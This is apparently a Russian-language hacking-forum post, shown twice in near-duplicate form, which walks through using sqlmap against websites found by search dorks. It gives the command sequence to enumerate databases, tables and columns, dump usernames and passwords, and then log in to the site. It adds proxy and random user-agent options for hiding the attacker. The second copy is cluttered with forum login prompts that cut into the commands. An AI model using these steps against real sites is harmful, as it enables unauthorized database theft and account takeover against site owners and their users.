Представленная ниже инфа была составлена SlipX'ом, заливаю ее в дополнение к своему видеогайду, плюс мои дополнения. Я думаю SlipX не расстроится, что я добавил его тему))
Для работы с sqlmap на понадобится
sqlmap - качаем:
Python2.7 -
Скачиваем последний версию с sqlmap.org
Распаковываем архив и закидываем туда cmd.exe
(идем в папку c:\windows\system32 там файл cmd.exe копируем его в папку sqlmapml)
sqlmap - GET метод
Для начала нам нужна дорка, как только нашли дорку открываем sqlmap и пишем
Код:
sqlmap.py -u "
sqlmap будет обнаруживать уязвимость вашей дорки и скажет вам какой тип уязвимости и тип базы данных, если цель уязвима переходим к следующему шагу.
Находим database name
Через эту команду находим имя базы данных
Код:
sqlmap.py -u "
Тут sqlmap найдет database name нашей цели, к примеру "web_db"
Находим tables name
После того как sqlmap нашел имя базы данных,ищем tables name.
Через эту команду находим название таблиц
Код:
sqlmap.py -u "
Это покажет таблици в "web_db" базе данных , к примеру "tbl_admin"
Находим columns name
Находим что внутри "tbl_admin" от "web_db" и это будут наши columns. Через эту команду находим columns type
Код:
sqlmap.py -u "
Это покажет нам список названий столбцов, к примеру "user" и "password"
Дамп/dump
Эта команда сдампит все что есть в столбцах
Код:
sqlmap.py -u "
И тут мы находим "user = admin" и "password = adminpass".
Идем на сайт и заходим
Инфу нашел в инете и перевел
Так же можно и так: (меня пытались научить^^)(но мыл не было)
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --technique=BEU
sqlmap.py - это запуск самой программы
-u - цель
--random-agent - это скульмап берет произвольный user-agent из своей базы
--thread 10 это количество одновременных потоков минимум 1 максимум 10
--technique=BEU - техника эксплуатации Blind,Union,Error
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --current-user --current-db --privileges
--current-user - пользователь БД
--current-db - база с которой работаем
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dbs
проверям к каким базам данных у нас есть доступ
покажет так:
available databases [2]:[*] имя[*] имя
(может быть одна или больше баз)
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --count -D имя
Сейчас скульмап даст таблицы в базе данных "имя" и сколько записей в каждой таблице
к примеру:
Database: имя
+-------------+---------+
| Table | Entries |
+-------------+---------+
| ASIGNALOGO | 420 |
| NOTAS | 411 |
| FOTOS | 342 |
| POBLACIONES | 28 |
| LOGOS | 7 |
+-------------+---------+
теперь можно посмотреть колонки в интересующей нас таблице
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -T LOGOS -D имя
Database: имя
Table: LOGOS
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| CODIGO | int(5) |
| DESCRIPCION | varchar(200) |
| FICHERO | varchar(40) |
| NOMBRE | varchar(120) |
+-------------+--------------+
либо можно во всех таблицах
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -D имя
Теперь дампим нужную таблицу
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dump -T LOGOS -D имя
дамп таблиц будет лежать в папке dump того сайта с которым мы работаем, он будет в формате .CSV открывать можно OFFICE'ом или текстовым редактором
Мой первый гайд так что тапками не кидаться (+ сам еще толком не вьехал в прогу)
BY SlipX
Addon by Shigeo:
Немного дополню: вы можете использовать прокси при использовании данной программы для этого необходимо дописывать параметр:
Код:
--proxy=
В качестве типа прокси может также выступать socks4/5. В таком случае наш параметр будет выглядеть следующим образом:
Код:
--proxy=socks5://255.255.255.255:8080, где 255.255.255.255:8080 это наша прокся, а socks5// тип прокси.
Пример использования:
Код:
sqlmap.py -u
И так далее во всех операциях:
Код:
sqlmap.py -u
Код:
sqlmap.py -u
Код:
sqlmap.py -u
Для новичков можно использовать --wizard он облегчит вам работу.
Значит так:
Код:
sqlmap.py --wizard
дальше следуем по инструкции нажимаем циферки 1 или 2
Для работы с sqlmap на понадобится
sqlmap - качаем:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Python2.7 -
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Скачиваем последний версию с sqlmap.org
Распаковываем архив и закидываем туда cmd.exe
(идем в папку c:\windows\system32 там файл cmd.exe копируем его в папку sqlmapml)
sqlmap - GET метод
Для начала нам нужна дорка, как только нашли дорку открываем sqlmap и пишем
Код:
sqlmap.py -u "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
"sqlmap будет обнаруживать уязвимость вашей дорки и скажет вам какой тип уязвимости и тип базы данных, если цель уязвима переходим к следующему шагу.
Находим database name
Через эту команду находим имя базы данных
Код:
sqlmap.py -u "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
" --dbsТут sqlmap найдет database name нашей цели, к примеру "web_db"
Находим tables name
После того как sqlmap нашел имя базы данных,ищем tables name.
Через эту команду находим название таблиц
Код:
sqlmap.py -u "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
" -D web_db --tablesЭто покажет таблици в "web_db" базе данных , к примеру "tbl_admin"
Находим columns name
Находим что внутри "tbl_admin" от "web_db" и это будут наши columns. Через эту команду находим columns type
Код:
sqlmap.py -u "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
" -D web_db -T tbl_admin --columnsЭто покажет нам список названий столбцов, к примеру "user" и "password"
Дамп/dump
Эта команда сдампит все что есть в столбцах
Код:
sqlmap.py -u "
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
" -D web_db -T tbl_admin -C user,password --dumpИ тут мы находим "user = admin" и "password = adminpass".
Идем на сайт и заходим
Инфу нашел в инете и перевел
Так же можно и так: (меня пытались научить^^)(но мыл не было)
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --technique=BEU
sqlmap.py - это запуск самой программы
-u - цель
--random-agent - это скульмап берет произвольный user-agent из своей базы
--thread 10 это количество одновременных потоков минимум 1 максимум 10
--technique=BEU - техника эксплуатации Blind,Union,Error
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --current-user --current-db --privileges
--current-user - пользователь БД
--current-db - база с которой работаем
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dbs
проверям к каким базам данных у нас есть доступ
покажет так:
available databases [2]:[*] имя[*] имя
(может быть одна или больше баз)
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --count -D имя
Сейчас скульмап даст таблицы в базе данных "имя" и сколько записей в каждой таблице
к примеру:
Database: имя
+-------------+---------+
| Table | Entries |
+-------------+---------+
| ASIGNALOGO | 420 |
| NOTAS | 411 |
| FOTOS | 342 |
| POBLACIONES | 28 |
| LOGOS | 7 |
+-------------+---------+
теперь можно посмотреть колонки в интересующей нас таблице
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -T LOGOS -D имя
Database: имя
Table: LOGOS
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| CODIGO | int(5) |
| DESCRIPCION | varchar(200) |
| FICHERO | varchar(40) |
| NOMBRE | varchar(120) |
+-------------+--------------+
либо можно во всех таблицах
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --columns -D имя
Теперь дампим нужную таблицу
Код:
sqlmap.py -u "дорка" --random-agent --thread 10 --dump -T LOGOS -D имя
дамп таблиц будет лежать в папке dump того сайта с которым мы работаем, он будет в формате .CSV открывать можно OFFICE'ом или текстовым редактором
Мой первый гайд так что тапками не кидаться (+ сам еще толком не вьехал в прогу)
BY SlipX
Addon by Shigeo:
Немного дополню: вы можете использовать прокси при использовании данной программы для этого необходимо дописывать параметр:
Код:
--proxy=
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
, где 255.255.255.255:8080 это наша прокся, а http:// тип прокси.В качестве типа прокси может также выступать socks4/5. В таком случае наш параметр будет выглядеть следующим образом:
Код:
--proxy=socks5://255.255.255.255:8080, где 255.255.255.255:8080 это наша прокся, а socks5// тип прокси.
Пример использования:
Код:
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--proxy=Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
И так далее во всех операциях:
Код:
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--proxy=Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbsКод:
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--proxy=Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--dbsКод:
sqlmap.py -u
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--proxy=Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
-D web_db --tablesДля новичков можно использовать --wizard он облегчит вам работу.
Значит так:
Код:
sqlmap.py --wizard
дальше следуем по инструкции нажимаем циферки 1 или 2